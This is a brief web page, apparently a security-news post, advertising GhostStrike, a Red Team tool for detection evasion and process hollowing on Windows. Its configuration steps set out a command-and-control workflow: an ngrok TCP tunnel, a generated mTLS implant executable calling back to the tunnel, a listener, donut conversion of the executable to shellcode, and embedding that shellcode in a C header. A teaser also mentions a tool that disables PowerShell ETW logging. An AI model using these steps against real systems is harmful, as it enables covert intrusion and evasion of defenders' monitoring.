GhostStrike is an advanced cybersecurity tool designed for Red Team operations, featuring sophisticated techniques to evade detection and perform process hollowing on Windows systems.
You can configure GhostStrike with the following steps:
ngrok tcp 443
generate --mtls x.tcp.ngrok.io --save YourFile.exe
mtls --lhost 0.0.0.0 --lport 443
./donut -i /home/YourUser/YourFile.exe -a 2 -f 1 -o /home/YourUser/YourFile.bin
xxd -i YourFile.bin > YourFile.h
g++
, clang++
, or Visual Studio, is sufficient to compile the code.No additional dependencies are needed to build GhostStrike. Simply compile the source code with your preferred C++ compiler, and you’re ready to go!
Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…
This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…
GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…
Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…
The free and open-source security platform SecHub, provides a central API to test software with…
Don't worry if there are any bugs in the tool, we will try to fix…